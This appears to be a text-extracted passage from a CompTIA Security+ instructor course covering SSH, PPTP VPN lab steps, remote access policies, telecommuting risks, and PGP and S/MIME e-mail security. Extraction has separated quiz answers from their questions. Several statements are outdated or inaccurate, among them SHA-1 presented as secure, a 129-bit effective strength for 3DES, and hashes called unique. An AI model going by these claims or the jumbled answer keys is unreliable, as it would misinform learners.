A secure shell (SSH) is a secure replacement for remote logon and file transfer programs such as Telnet and FTP, which transmit data in unencrypted text. SSH uses a public key authentication method to establish an encrypted and secure connection from the users machine to the remote machine. When the secure connection is established, then the username, password, and all other information is sent over this secure connection. SSH is becoming a standard for remote logon administration. It has become so popular there are many ports of SSH for various platforms, and there are free clients available to log on to an SSH server from many platforms as well. SSH Certifier is designed to be a widely applicable product, and it runs on a wide variety of different platforms including Windows, Linux, HP-UX and Solaris. In the enrollment process, the end-user requesting a certificate must be authenticated. If the entity has a valid certificate, the private key can be used for authentication when using certain enrollment protocols; however, the user does not typically possess a valid private key for the enrollment process. First-time authentication can be done either manually or by generating shared secrets for entities. When shared keys are delivered to end entities by secure means, the users can authenticate themselves during the online enrollment, and the request can be approved automatically, if the policy allows automatic acceptance. This method is especially useful in applications in which shared secrets can be delivered in the same package with the client software and certification authority certificate. If the enrollment protocol does not support shared secrets or they are just not used, authentication has to be done in an out-of-band way, such as by showing valid identity information for the operator. The operator can then make the approval decision manually.
Tell students that in SSH, public key authentication is used before a connection is established. Mention that SSH is rapidly replacing Telnet for remote administration of UNIX and Linux systems, and even some Windows systems.
424
CompTIA Security+ Certification The authentication requirements and the certificate templates for the certificate issuance are defined in the certification policy. The policy can be configured via the administration graphical user interface. The key components of an SSH product are the engine, the administration server, the enrollment gateway, and the publishing server. Each of these components can be placed either on separate machines or on a single machine. The engine receives certification requests from the enrollment gateway, makes policy decisions, and generates and signs certificates and Certificate Revocation Lists (CRLs). The engine also communicates with the administration server and performs the required database queries. The administration server is an HTTP server with a Transport layer security (TLS) implementation. The graphical user interface can be easily customized by modifying the HTML code, also by using the script tools of Certifier, the functionality of the GUI can be expanded. The enrollment gateway has the server-side implementations of the supported certificate enrollment protocols. It receives certificate requests from the enrollment clients and forwards them to the engine for policy decisions. The enrollment gateway also sends confirmation messages and issues certificates to end entities. The issued certificates and CRLs are sent to the publishing server, which performs the LDAP publishing in the directory. For more information on IPSec and SSH, visit www.ssh.com.
Do it!
C-3: Using PPTP to connect to a VPN server Heres how Heres why
1 On Server-Y, click Start 2 Choose Control Panel,
Network Connections, New Connection Wizard
Students will perform this activity in pairs on ServerX and Server-Y as indicated in the activity steps. If students are prompted to provide Location information, tell them to enter an area code and click OK twice.
3 Click Next 4 Select Connect to the

network at my workplace
Click Next 5 Select Virtual Private

Network connection
Click Next 6 Type Class VPN PPTP Click Next

To specify a name for the connection
Remote access 7 Enter the IP address of the VPN server (Server-X) Click Next 8 Select Anyone's use Click Next 9 Check Add a shortcut to this
connection to my desktop
425
If you don't know Server-X's IP address, have your partner open a Command window, enter ipconfig and note the server's IP address.
10 Click Finish 11 Log on as Administrator 12 On Server-X, access Computer

Management
You are prompted to log on. You are now connected to Server-X. To configure the Administrator account to require a remote access policy for access. Activate the Dial-in tab in the Properties of the Administrator user to see the option.
13 Change the Administrator user's dial-in access to Control

access through Remote Access Policy
14 At Server-Y, disconnect the Class VPN PPTP connection and try to connect again 15 Close all windows
The connection is denied because an appropriate remote access policy has not been configured.
426
Do it!
C-4:
Discussing tunneling protocols

1 TCP/IP transports digital data over the Internet infrastructure. True or false?
True
2 Data sent from a dial-up modem is encapsulated within a(n) _______ packet.
A
PPP IP IPX NetBEUI
B C D
3 PPTP uses IPSec to authenticate users. True or false?

False: It uses PPP for authentication.
4 LT2P uses UDP to encapsulate PPP frames with L2TP headers. True or false?
True
5 L2TP provides tunneling capabilities for which of the following internetworks? A B C

D
Frame Relay ATM IP All of the above
6 Describe the differences in the IPSec transport and tunnel modes.

Transport mode encrypts the data portion of each packet, but not the header. Its typically used in host-to-host VPNs. Tunnel mode encrypts both the header and the data portion of each packet. Its used in host-to-gateway or gateway-to-gateway VPN communications.
7 Which protocol uses the IKE public key system to certify and sign data packets?
Authentication header
8 Which protocol uses symmetric encryption to encrypt the IP payload for confidentiality?
Encapsulating security payload
9 Which of the following protocols can be used with PPTP? A B

C
IPX/SPX NetBEUI TCP/IP AppleTalk
Remote access
427
Topic D: Telecommuting vulnerabilities

# 2.1 Objective Recognize and understand the administration of the following types of remote access technologies Vulnerabilities
Telecommuting
Explanation Many large companies have begun using remote access technologies as a method to reduce costs and improve employee satisfaction. The benefits gained by telecommuting must be carefully weighed against the increased vulnerabilities. In the telecommuting model, the home office is arguably not trusted. The lack of physical access control would indicate that no matter how trusted a computer is when first configured, after spending time at a users home, the state of a machine is in question.
Security issues
Although VPNs and encryption are powerful tools, they do not protect against all threats. Misconfigured firewalls, unrestricted physical access, weak encryption, and sporadic auditing leave the remote PC an easy target for attackers. Split tunneling The simplest VPN configuration consists of a VPN client computer with an Internet connection. This setup can introduce a major risk called split tunneling. Split tunneling allows a remote PC to surf the Web and access the corporate VPN simultaneously. The benefit of split tunneling is that corporations can conserve bandwidth needed for Internet access at VPN hub sites and reduce the load on VPN gateways. The drawback is that, if a remote PC is connected directly to the Web and at the same time tied into the VPN, attackers coming on from the Web could commandeer the PC and gain access to the corporate network. The integrity of the remote PC can just as easily be compromised while the user is Web surfing with the VPN tunnel turned off. Viruses or back doors downloaded while surfing would threaten the VPN the next time it is connected. Unsecured data files As telecommuters download data files to their home PCs, all safeguards implemented at the corporate office to protect sensitive information are negated. The central office has legally lost control over that data. With limited physical protection, hackers can steal portable computers or hard drives and, given enough time, break any security in place. The attacker can gain access to corporate data and, potentially, the corporate network.
428
CompTIA Security+ Certification Compromised certificates Many IT professionals use digital certificates to add a layer of security to their VPN clients. In the context of a computer system in an uncontrolled environment, the certificate can be more vulnerable than traditional password authentication. The attacker can easily crack a weak pass-phrase using brute force. Once compromised, the certificate could be used to authenticate the attacker to the central office and even other businesses. Unlike passwords that change regularly, certificate pass-phrases can be valid for a year or more. War dialing War dialing refers to calling a block of numbers randomly until a modem answers. If the attacker finds a modem, he might use it to dial into another network to avoid longdistance charges or to mask his identity during an attack. Limited accounting Another issue concerning remote access is the lack of auditing. A record of security, system, and application events only exists on the compromised system, a serious violation of the standard for event logging. The moment the VPN link is terminated, the remote computers state cannot be guaranteed. Misconfigured firewalls Home systems connected to the Internet through broadband or cable modem are sharing a bus with other computers in the neighborhood. This provides many opportunities for an attacker to send and receive data undetected. As long as the computer is on, its subject to attack. In addition, personal firewalls provide a false sense of security: when misconfigured, they are ineffective in protecting the system against eavesdroppers and hackers.
Solutions
The following recommendations will protect the remote PC against most threats: Install a personal firewall at the remote PC. Filter both incoming and outgoing packets. Configure Web browsers to limit browser plugins, such as ActiveX and Javascript. Make sure PC operating systems and applications have updated security patches. Use virus-scanning software and update it religiously. Set it to scan incoming email and attachments. Disable cookies to prevent monitoring of browser habits. Use strong passwords. Encrypt sensitive and critical information. One very effective solution that circumvents all the above precautions is to provide the employee with a remote session (or thin-client) solution. This eliminates the issue of storing data on the remote computer. Thin clients have no local storage or functionality beyond connecting to a remote session server. When the connection to the central office is broken, the data stays safely at the central office.
Remote access
429
Configuration of a remote access policy

While remote access is an essential tool for todays businesses, it also has the potential to open a wide range of security holes. One way an administrator can overcome this is by using Windows Server 2003 Remote Access Policies. Remote Access Policies can lock down a remote access system to ensure only those intended to have access are actually granted that access. Do it!
D-1:
Configuring a remote access policy Heres why
Heres how
For this activity, students will work in pairs. Each partnership will use two machines, Server-X and Server-Y. Instruct students to substitute their servers hostname for Server-X and their partners server hostname for Server-Y.
1 On Server-X, click Start Choose Administrative Tools, Routing and Remote

Access To access the Routing and Remote Access window.
2 Expand SERVER-X 3 Right-click Remote Access

Policies
Choose
New Remote Access Policy
To start the New Remote Access Policy wizard.
4 Click Next 5 In the Policy name box, type

Allow all users access
Click Next 6 Click Next 7 Select User Click Next 8 Click Next 9 Click Next 10 Click Finish 11 Double-click Remote Access
Policies You'll see the Allow all users access policy in the right pane. To display the Properties of the remote access policy. Remote access policies are configured to deny rather than grant access by default. To save your changes. To accept the default authentication method. To accept the default Policy Encryption Level. To accept the default access method of VPN.
12 Double-click Allow all users

access
13 Select Grant remote access

permission
Click OK
430
CompTIA Security+ Certification 14 Close the Routing and Remote Access window 15 Open Computer
Management Windows Server 2003 does not allow dial-in access by default. In order to allow remote access to a Windows Server 2003 server, you must configure the Remote Access Permissions on a user-by-user basis. Administrator is an exception to this rule; Administrator is allowed to connect remotely by default.
16 Expand
Local Users and Groups
Select Users 17 Double-click User1 18 Activate the Dial-in tab 19 Select Control access
through Remote Access Policy To change the dial-in access for User1.
Click OK 20 Repeat steps 17 through 19 for User2 21 Log on to Server-Y as User1 and try to access the Class VPN PPTP connection 22 On Server-X, click Start Choose Administrative Tools, Routing and Remote
Access Youll be able to connect using the remote access policy.
To start the process of disabling Routing and Remote Access.
23 Right-click Server-X 24 Choose Disable Routing and

Remote Access
Click Yes 25 Close all windows
User1 is disconnected from the server when the service is stopped.
Remote access
431
Unit summary: Remote access

Topic A In this topic, you learned that with the continued growth of remote access computing, the need for remote access security has become paramount. You learned about some of the challenges faced when communicating over unsecured dial-up, ISDN, DSL, and cable modem channels. In this topic, you learned about the various authentication methods used for remote access. You learned about the IEEE 802.1X protocol, which builds on the standards outlined in the Point-to-Point Protocol (PPP) and Extensible Authentication Protocol (EAP) to control access to the corporate network. You also learned about Remote Authentication Dial-in User Service (RADIUS), which uses open protocols to provide a centralized and scalable security system, and Terminal Access Controller Access Control System (TACACS+), an authentication protocol developed by Cisco Systems to address the need for multiprotocol support and scalability. In this topic, you learned about VPN technology and its tunneling protocols. Corporate networks use site-to-site and remote access VPNs to connect remote offices and users to the corporate network. Four tunneling protocols commonly used in VPN, Point-to-Point Tunneling Protocol (PPTP), L2TP, Secure Shell, and IPSec, use encapsulation and encryption to transmit sensitive data over the Internet. In this topic, you learned about the different vulnerabilities associated with telecommuting. Many large companies have begun using telecommuting as a method to reduce costs and improve employee satisfaction, unfortunately, the benefits gained by telecommuting come with the price of an increased security threat.
Topic B
Topic C
Topic D
Review questions
1 PPTP is built upon _______ and ________, two well-established communications protocols. A PPP, UDP
B
PPP, TCP/IP
C LDAP, PPP D TCP/IP, UDP 2 SSH uses a _____________ key authentication method to establish a secure connection. A Private
B
Public
C Encrypted D Skeleton 3 The RADIUS architecture allows all information to be located on a single central database. True or false?
True
432
CompTIA Security+ Certification 4 _____________ is an authentication method that was developed to address scalability and connection-oriented services. A 802.1X B RADIUS C X.25
D
TACACS+
5 IPSec uses a(n) ______________ algorithm for negotiating which keys to use for symmetric encryption.
A
Asymmetric
B Symmetric C Proprietry D Encryption 6 What are the available PPTP protocol enhancements? (Choose all that apply.) A PPP is multiprotocol B Offers authentication C Offers methods of privacy and compression of data
D
All of the above
7 RADIUS always encrypts the password in the packet. True or false?

True
8 TACACS+ separates which of the following?

A
Authentication, authorization, and accounting
B Authentication, authorization, and availability C Authorization, accounting, and availability D Authentication, accounting, and availability 9 The acronym NAS stands for network authentications server. True or false?
False: It means network access server.
10 Remote access logging can log which of the following events? A Accounting requests B Authentication requests C Periodic status
D
All of the above
51
Unit 5 E-mail
A Define secure e-mail and how it works. B Describe the characteristics of PGP and
S/MIME.
C Identify and safeguard against e-mail
vulnerabilities.
52
Topic A: Secure e-mail and encryption

# 4.2 Objective Understand how cryptography addresses the following security concepts Confidentiality Integrity Digital Signatures Authentication Non-Repudiation Digital Signatures
E-mail
Explanation Over the course of the past decade, electronic mail has become the mission-critical business application and changed the way we work forever. The result has been a massive increase in productivity; however, e-mail is an incredibly vulnerable tool. For the most part, it is transmitted across the Internet in plaintext so any intermediary could read or modify it, and worse, anyone could set up an e-mail account and claim to be that person. E-mail security is not the only challenge to maintaining the utility and productivity gains offered by e-mail. Floods of spam, or unrequested junk mail, are another hazard that workers in the new digital office must navigate. Hoaxes further threaten to reduce worker productivity and create chaos on the corporate network. The technologies presented in this unit, Pretty Good Privacy (PGP) and Secure/Multipurpose Internet Mail Extension (S/MIME), seek to ensure the integrity and privacy of information by wrapping security measures around the e-mail data itself. These two competing standards use public key encryption techniques.
Goals of secure e-mail

Secure e-mail uses cryptography to secure messages transmitted across insecure networks. The advantage of e-mail encryption is that e-mail can be transmitted over unsecured links without risk that the e-mail will be read or modified. Further, the e-mail can be stored in encrypted form, protecting the contents from prying eyes long after it has been delivered to its destination. Secure e-mail provides four main features: Confidentiality By encrypting messages, the sender and the recipient can transmit data to each other over an unsecured or monitored link (i.e., the Internet) without worrying that their communications are monitored. That is to say, secure e-mail provides a guarantee of privacy. Integrity The communicating parties can also be sure their data has not been modified while in transit. This is a very important feature for many government and commercial applications.
E-mail
53
Authentication Secure e-mail uses secret encryption keys that only the owners know and have access to, so the recipient of the e-mail knows for a fact that it was sent by the person it purports to be from. Nonrepudiation Just as with authentication, the recipient of the message knows for a fact that the message was sent by the person appearing in the messages FROM: field, and that the details of the message body were received as they were written. The sender cannot claim the message did not originate from his or her computer or the contents of the message were changed in transit.
Terminology
The key cryptography concepts you need to understand are encryption, digital signatures, and digital certificates. These concepts are covered briefly in this section so you can recognize how they are used to make e-mail more secure.
Inform the students that, although most of the key terms and concepts relating to cryptography are explained in this unit, they are covered in depth in the Cryptography unit.
Encryption
When people think of secure e-mail, encryption is the technology that comes to mind. Encryption provides privacy, integrity, authentication, and nonrepudiation. These are the primary features of secure e-mail:
Exhibit 5-1: How conventional encryption works Encryption is the conversion of data into code to make it unreadable, as shown in Exhibit 5-1. It is accomplished by taking data and passing it, along with a value, called a key, through an algorithm that makes the data completely unreadable. The only way to recover the information is to reverse the process using the appropriate key. Even though the encryption algorithm is known, without also having the key, it is impossible to recover the original data. The two main types of encryption are; conventional cryptography, in which the same key is used for encryption and decryption, and public key cryptography, which uses a publicly distributed key for encryption and a secret private key for decryption.
54
Hash function
A hash function is a function that takes plaintext data of any length and creates a unique fixed-length output. For example, the message could be 1 KB or 1 MB in size, but the hash output on either message would be the same fixed length. The result of the hash function is called a message digest. The essential principle of a cryptologically sound hash function is that if the input were changed by a single bit, the message digest would be different. Its also important to remember that the original message cannot be derived from the message digest; hash functions work only in one direction. Two major hash functions are used today. SHA-1 (Secure Hash Algorithm 1) was developed by the National Security Agency (NSA) and is considered the more secure of the two commonly used algorithms. It produces 160-bit digests.
Information about breaking MD5 can be found at scramdisk.clara.net/ pgpfaq.html #SubMD5Implic.
The other common hash algorithm is MD5 (Message Digest algorithm version 5), which produces 128-bit digests. RSA Security has placed MD5 in the public domain; therefore, no licensing is required to use it. Cryptography experts have shown that MD5 has major flaws, and it is likely that it will be broken in the future.
Do it!
A-1:
Discussing encryption and hash functions

1 What is one measure a user can use to ensure confidentiality when sending e-mail messages?
Encrypt the messages
2 A message digest is the product of running a message through a hash function. True or false?
True
3 Once data is encrypted, the only way to recover the information is to _____. A B C
D
Attach a digital certificate Share the private key Pass it through a hash function Reverse the process using the appropriate key
4 The hash function is a good method for determining whether a message has been altered. True or false?
True
5 A hash function takes plaintext and creates a fixed-length output regardless of the size of the message. True or false?
True
E-mail
55
Digital signatures
Explanation A digital signature is a digital code that can be attached to an electronic message to uniquely identify the sender. Digital signatures provide integrity, authentication, and nonrepudiation. That is, by using a digital signature, a user can receive a plaintext message and still know with a high degree of certainty that the message has not been tampered with, and indeed comes from the person it claims to be from with no possibility the sender could truthfully deny sending the message. Digital signatures are created using hash functions. You perform a hash on the message to create a message digest, and then you sign the message by encrypting the message digest with your own private key, as shown in Exhibit 5-2.
Exhibit 5-2: How digital signatures are created When the receiver gets the message, that person can verify its integrity: the message digest is recreated by performing a hash on the message using the same hashing algorithm as the sender. The message digest is then compared against the digest that came with the message (after decrypting it with the senders public key). If the two versions of the digest are the same, then the message has not been altered. The fact that the receiver can recover the original message digest using the senders public key guarantees its authenticity and provides nonrepudiation.
56
Digital certificates
A digital certificate is an attachment to an electronic message used for security purposes. It provides a type of credential, much like a passport or drivers license. Digital certificates are similar to digital signatures in that a public key and private key are used, but with digital certificates, there is an endorser who vouches for the authenticity and identity of the public key holder. The digital certificate contains the following information: The owners public key, which is used to encrypt messages to its owner One or more pieces of information that uniquely identify the owner (for example, a name and e-mail address) The digital signature of an endorser (called the Certificate Authority), stating that the public key actually belongs to the person in question Exhibit 5-3 shows the structure of one major digital certificate standard, the X.509 certificate.
Exhibit 5-3: A digital certificate Much like a real certificate, a digital certificate helps others to verify the owner of the public key is who he says he is. This is a valuable addition to the normal features of encryption. Digital certificates are designed to answer the question of whom an e-mail address and public key really belong to; you dont know, unless the sender has a digital certificate and you trust the authority that signed the certificate. In the real world, you might rely on a passport to authoritatively identify the person who carries it, but only because you trust the government to issue the passport only to the right person. The same can be said for digital certificates: the certificate is only as good as your trust for the authority that issued it.
E-mail
57
Combining encryption methods

PGP and S/MIME use a combination of conventional encryption and public key encryption. For that reason, these technologies are said to be hybrid cryptosystems. The reason for this hybrid is to overcome the shortcomings of both public key and conventional (or symmetrical) cryptosystems. Conventional encryption is very fast, but it uses symmetrical keys for encryption and decryption, which is to say, both the recipient and the sender must have the same secret key to encode and decode their messages. The problem lies in sending the secret key to the other person without it being compromised. Worse, in order to keep your conversations private, you need a different set of keys for every person with whom you communicate. Conventional encryption results in what is called the key distribution problem (the challenge of getting keys securely to their recipients). Conversely, public key encryption is slow but has solved the problem of key distribution. In this scheme, each person has a private key and a public key, as shown in Exhibit 5-4.
Exhibit 5-4: How public key encryption works The private key is used for decryption and is kept secret. The public key is used for encryption and is freely distributed. For example, Marys public key is the only key that anyone needs to encrypt a message to her. Once a message has been encrypted using Marys public key, it can only be decrypted with her private key. Not even the sender can decrypt the message once its been encrypted with Marys public key. So key distribution is not an issue with public key technologybut the actual process of encrypting is much, much slower.
58
Do it!
A-2:
Discussing digital signatures and certificates

1 Put the following steps in their proper sequence to determine whether a message has been tampered with or came from someone other than the specified sender. ___ The receiver compares his message digest value against the digest that came with the message. ___ The receiver decrypts the message. ___ You perform a hash on the message to create a message digest. ___ The receiver gets the message. ___ Encrypt the message digest with your own private key. ___ The receiver performs a hash on the message to create a message digest. 2 Which of the following uses the same key to encrypt and decrypt?
A
4 1 3 2 5
Conventional cryptography Traditional cryptography Public key cryptography Private key cryptography
B C D
3 Which of the following uses one key to encrypt and another to decrypt? A B
C
Conventional cryptography Traditional cryptography Public key cryptography Private key cryptography
4 Digital signatures provide integrity, confidentiality, and authentication. True or false?

False. They do not provide confidentiality.
5 Digital certificates contain which of the following types of information? A B C

D
The owners public key One or more pieces of information that uniquely identify the owner The digital signature of an endorser All of the above
E-mail
59
6 A hash function takes plaintext and creates a fixed-length output regardless of the size of the message. True or false?
True
7 What is the result of a hash function? A

B
Message Message digest Cipher Cipher text
C D
510
The encryption process

Explanation PGP and S/MIME encryption systems follow a specific process to secure e-mail messages before they are sent. The steps are: 1 The message is compressed (only with PGP). 2 A session key is created. 3 The message is encrypted using the session key with a symmetrical encryption method. 4 The session key is encrypted with an asymmetrical encryption method. 5 The encrypted session key and the encrypted message are bound together and transmitted to the recipient. The same steps are used, in reverse, to decrypt the message. If PGP is used, then the plaintext is compressed using the ZIP compression routines, provided it is long enough and is not already compressed. The reason for this is that compression adds to the cryptographic strength of the encrypted document because it reduces the patterns in the plaintext. These patterns are then represented in the encrypted version and are one of the primary points of cryptanalysis attack. This is the same method used by commercial compression packages such as WinZip and PKZIP. The e-mail encryption system creates a session key using a random number generated from the users mouse movements and keystrokes. These inputs help to ensure that the number really is randomcomputers have a hard time generating truly random numbers on their own. The plaintext is then encrypted using the session key and a conventional encryption algorithm. Conventional encryption is about 1000 times faster than public key encryption, so using the session key significantly speeds up the process of encrypting the users data. Notice that PGP and S/MIME use different conventional encryption systems. The session key is encrypted using the recipients public key, as shown in Exhibit 5-5. It is decrypted using the recipients private key. This technique leverages the speed and convenience of conventional encryption, but avoids the problem of distributing symmetrical keys that is inherent to conventional encryption; public key encryption allows the symmetrical key to be distributed along with the cipher text. The encrypted session key and the encrypted data are bound together. The encrypted message might now be sent over an unsecured network or channel to the recipient without fear the contents can be read or modified in transit. When you receive such an encrypted message, your e-mail client unbundles the encrypted message and the encrypted session key. The session key is decrypted using your private key. Then the session key is used to decrypt the contents of the message, as shown in Exhibit 5-6. All this happens transparently to the end-user.
E-mail
511
Exhibit 5-5: How secure e-mail encryption works
Exhibit 5-6: How secure e-mail decryption works
512
Do it!
A-3:
Understanding the encryption process

1 Put the following steps in the correct sequence to describe the encryption process. ___ A session key is created. ___ The message is compressed (only with PGP). ___ The session key is encrypted with an asymmetrical encryption method. ___ The encrypted session key and the encrypted message are bound together and transmitted to the recipient. ___ The message is encrypted using the session key with a symmetrical encryption method.
2 1 4
2 S/MIME compresses plaintext using ZIP compression before encrypting the message. True or false?
False: PGP compresses the plaintext first.
3 In what manner does compression strengthen encryption?

It reduces the patterns in the plaintext.
4 How is the session key generated?

The encryption system uses a random number generated from the users mouse movements and keystrokes.
5 The plain text message is encrypted using the public key to create cipher text. True or false?
False: The plain text message is encrypted using the session key.
6 How is the session key protected during transmission over the Internet?
The session key is encrypted using the recipients public key.
7 The encrypted session key is sent in a separate message from the cipher text. True or false?
False: It is sent with the cipher text.
8 The session key is decrypted using the recipients private key. True or false?
True
E-mail
513
Topic B: PGP and S/MIME encryption

# 2.2 Objective Recognize and understand the administration of the following e-mail security concepts S/MIME (Secure Multipurpose Internet Mail Extensions) PGP
Background on PGP
Explanation PGP and S/MIME both use encryption and digital signatures to achieve the goal of secure e-mail, however, their formats and implementations are significantly different. PGP establishes authenticity through a Web of trust and places the responsibility of authentication on each user. S/MIME uses a Certificate Authority (CA) to establish trust. The two protocols are incompatible. PGP is an encryption technology that has grown up with the Internet. PGP was originally written by Phil Zimmerman in 1991 to fill the gap in effective, commercially available encryption software. PGP supports four major symmetric encryption methods: CAST An algorithm for symmetric encryption named after its designers (Carlisle Adams and Stafford Tavares). CAST is owned by Nortel, but available to anyone on a royalty-free basis. CAST is a fast method of encrypting data and has stood up to attempted cryptanalytic attacks. Cast uses a 128-bit key and has no weak or semi-weak keys. International Data Encryption Algorithm (IDEA) Originally published in 1992, IDEA has a decent record of withstanding attacks, and however, the fact that the algorithm must be licensed from Ascom Systec has impeded its adoption. IDEA uses a 128-bit key. Triple Data Encryption Standard (3DES) Based on the DES, which uses a 56bit key, 3DES runs the same algorithm three times to overcome its short key size. Although (3 x 56) bits equals 168 bits, the effective key strength of 3DES is approximately 129 bits. 3DES is perhaps the industry standard algorithm for encryption. 3DES is much slower than either IDEA or CAST. Twofish One of five algorithms that were finalists to be selected for the Advanced Encryption Standard (AES), Twofish was selected for inclusion into PGP before the winner was announced in 2001. Although Twofish was not ultimately selected to be used in the standard, it is a strong algorithm that has withstood examinations by industry experts. Like all AES contestants, Twofish has 128-bit, 192-bit, and 256-bit key sizes.
514
CompTIA Security+ Certification PGP certificates PGP defines its own standard for digital certificates. PGP certificates are very similar to X.509 certificates in some respects but are notably more flexible and extensible. One unique aspect of the PGP certificate format is that a single certificate can contain multiple signatures. Several or many people might sign the key/identification pair to attest to their own assurance that the public key definitely belongs to the specified owner. If you look on a public certificate server, you might notice certain certificates, such as that of PGPs creator, Phil Zimmermann, contain many signatures. The table below provides an outline of the PGP certificate format.
Certificate PGP version number Certificate format Version of PGP, which was used to create the key associated with the certificate. Public portion of your key pair, together with the algorithm of the key, which is RSA, RSA Legacy, Diffie-Hellman or Digital Signature Algorithm (DSA). Identity information about the user, such as his or her name, user ID, e-mail address, ICQ number, photograph, and so on. Signature created with the private key corresponding to the public key associated with this certificate. Start date/time and expiration date/timeindicates when the certificate will expire. Encryption algorithm to which the certificate owner prefers to have information encrypted; the supported algorithms are CAST, IDEA, 3DES, and Twofish.
Certificate holders public key
Certificate holders information
Digital signature of the certificate owner Certificates validity period
Preferred symmetric encryption algorithm for the key
E-mail Do it!
515
B-1: Discussing PGP Questions and answers

1 Match the following symmetric algorithms with their definition: CAST IDEA 3DES Twofish
Twofish CAST 3DES
Offers 128-bit, 192-bit, and 256-bit keys and included in PGP in 2001 Uses a 128-bit key and available to anyone on a royalty-free basis Uses a 56-bit key but runs the same algorithm three times to produce an effective key strength of 129 bits Uses a 128-bit key and is licensed by Ascom Systec
IDEA
2 One unique aspect of the PGP certificate format is that a single certificate can contain: A
B
Single signatures Multiple signatures Multiple public keys Multiple algorithms
C D
3 Which of the following is contained within a PGP certificate? (Choose all that apply.)
A
PGP version number Certificate holders private key Certificate holders information Digital signature of the certificate owner Preferred symmetric encryption algorithm for the key
B
C D E
516
Background on S/MIME
Explanation S/MIME is a protocol for secure electronic mail and was designed to add security to email messages in MIME format. The security services offered are authentication (using digital signatures) and privacy (using encryption). S/MIME v3 was made a standard in July, 1999, by IETFs S/MIME Working Group. The S/MIME v3 standard consists of six parts: Diffie-Hellman Key Agreement Method (RFC 2631) S/MIME Version 3 Certificate Handling (RFC 2632) S/MIME Version 3 Message Specification (RFC 2633) Enhanced Security Services for S/MIME (RFC 2634) Cryptographic Message Syntax (RFC 3369) Cryptographic Message Syntax (CMS) Algorithms (RFC 3370) S/MIME encryption algorithms S/MIME development began in 1995, and because of the specification needed to work within U.S. government export controls which existed until recently, S/MIME implementations have been required to support 40-bit RC2 (Rivest Cipher 2, a symmetric encryption cipher owned by RSA Data Security), which is known to be a very weak algorithm. Although 3DES is also a supported algorithm, and is in fact recommended, some have criticized S/MIME for being cryptographically weak, but it is only weak if a weak algorithm is chosen. The specification is very clear on the subject. Forty-bit encryption is considered weak by most cryptographers. Using weak cryptography in S/MIME offers little actual security over sending plaintext, however, other features of S/MIME, such as the specification of 3DES and the ability to announce stronger cryptographic capabilities to parties with whom you communicate, allows senders to create messages that use strong encryption. (RFC 2633, page 24) S/MIME recommends three symmetric encryption algorithms: DES, 3DES, and RC2. The adjustable key size of the RC2 algorithm makes it useful for applications intended for export outside the U.S. In some environments, hiding the identity of the sender is a requirement. This is in an effort to prevent traffic analysis, where an eavesdropper could gain valuable information on the communicants even if the message cannot be read. To thwart this, these environments use anonymous e-mailers or gateways that strip off the originating e-mail address. A digital signature could give the eavesdropper another piece of data to identify the sender, who is also the signer. S/MIME prevents this by applying the digital signature first, and then enclosing the signature and the original message in an encrypted digital envelope. In this way, no signature information is exposed to the eavesdropper. X.509 certificates Rather than define its own certificate type as PGP does, S/MIME relies on the X.509 certificate standard. To obtain an X.509 certificate, you must ask a certificate authority (CA) to issue one. You provide your public key, proof that you possess the corresponding private key, and some specific information about yourself. You then digitally sign the information and send the whole packagethe certificate requestto the CA. The CA then performs some due diligence in verifying the information you provided is correct and, if so, generates the certificate and returns it.
E-mail
517
You might think of an X.509 certificate as looking like a standard paper certificate (similar to one you might have received for completing a class in basic first aid) with a public key taped to it. It has your name and some information about you on it, plus the signature of the person who issued it to you. For an outline of the contents of X.509 certificates, see the table below:
Certificate X.509 version Certificate format Identifies which version of the X.509 standard applies to this certificate, which in turn determines what information can be specified in it. Public key of the certificate holder, together with an algorithm identifier that specifies which cryptosystem the key belongs to and any associated key parameters. Unique serial number to distinguish it from other certificates issued. This information is used in numerous ways; for example, when a certificate is revoked, its serial number is placed on a certificate revocation list (CRL). Intended to be unique across the Internet, a DN consists of multiple subsections and might look something like this: CN=Jonathan Public, E-MAIL=jonathanpublic@hotmail.com, OU=Security Team, O=Consulting Inc., C=US (These refer to the subjects Common Name, Organizational Unit, Organization, and Country.) Certificates validity period Unique name of the certificate issuer Start date/time and expiration date/time. Unique name of the entity that signed the certificate. This is normally a CA. Using the certificate implies trusting the entity that signed this certificate. Signature using the private key of the entity that issued the certificate. Algorithm used by the CA to sign the certificate.
Serial number of the certificate
Certificate holders distinguished name (DN)
Digital signature of the issuer Signature algorithm identifier
S/MIME trust model: certificate authorities S/MIME was designed from the outset as a purely hierarchical model. Keys or certificates are trusted based on the trustworthiness of the issuer, which is assumed to be of a higher value than that of the user. The line of trust can be followed up the chain of certificates to some root, which is generally a large commercial organization, a certificate authority engaged purely in the business of verifying identity and assuring the validity of keys or certificates.
518
Differences between PGP and S/MIME

S/MIME 3 (the current version, which has been accepted as an IETF standard) and OpenPGP (the open, standards-based version that grew out of PGP in 1997) are both protocols for adding authentication and privacy to messages. They differ in many ways, however, and are not designed to be interoperable. Some cryptography algorithms are the same between the two protocols, but others differ. The following table provides a comparison of the two protocols:
Features Structure of messages Structure of digital certificates Algorithm: symmetric encryption Algorithm: digital signature Algorithm: hash MIME encapsulation for signed data MIME encapsulation for encrypted data Trust model Marketplace adoption S/MIME 3 Binary, based on CMS X.509 3DES Diffie-Hellman SHA-1 Choice of multipart/signed or CMS format Application/PKCS#7-MIME Hierarchical Growing quickly because of use in Microsoft and Netscape browsers, e-mail clients, and in SSL encryption Microsoft, RSA, VeriSign OpenPGP PGP PGP 3DES ElGamal SHA-1 Multipart/signed with ASCII armor Multipart/encrypted Web of trust Current encryption standard among security professionals
Marketplace advocates
PGP, Inc., has been dissolved, but some of its products have been absorbed into the McAffee product line Configuration is not intuitive, and certificates must be created; general use is straightforward PGP software must be downloaded and installed
Ease of use
Configuration is not intuitive, and certificates must be obtained and installed; general use is straightforward Already integrated in Microsoft and Netscape products (both commercial and free versions) Certificates must be purchased from a certificate authority, and they have a yearly fee attached
Software
Cost of certificates
PGP Certificates can be generated by anyone and are free
E-mail
Features Key management S/MIME 3 Easy, but you must trust a certificate authority OpenPGP
519
Harder because the user must make decisions on the validity of identities, but you have granular control over whom you trust Compatible with MIME and nonMIME e-mail formats, but the recipient must have PGP installed Status of PGPs centralized management products in doubt
Compatibility
Transparently works with any vendors MIME e-mail client, but not compatible with non-MIME e-mail formats Centralized management possible through public key infrastructure (PKI) offerings
Centralized management
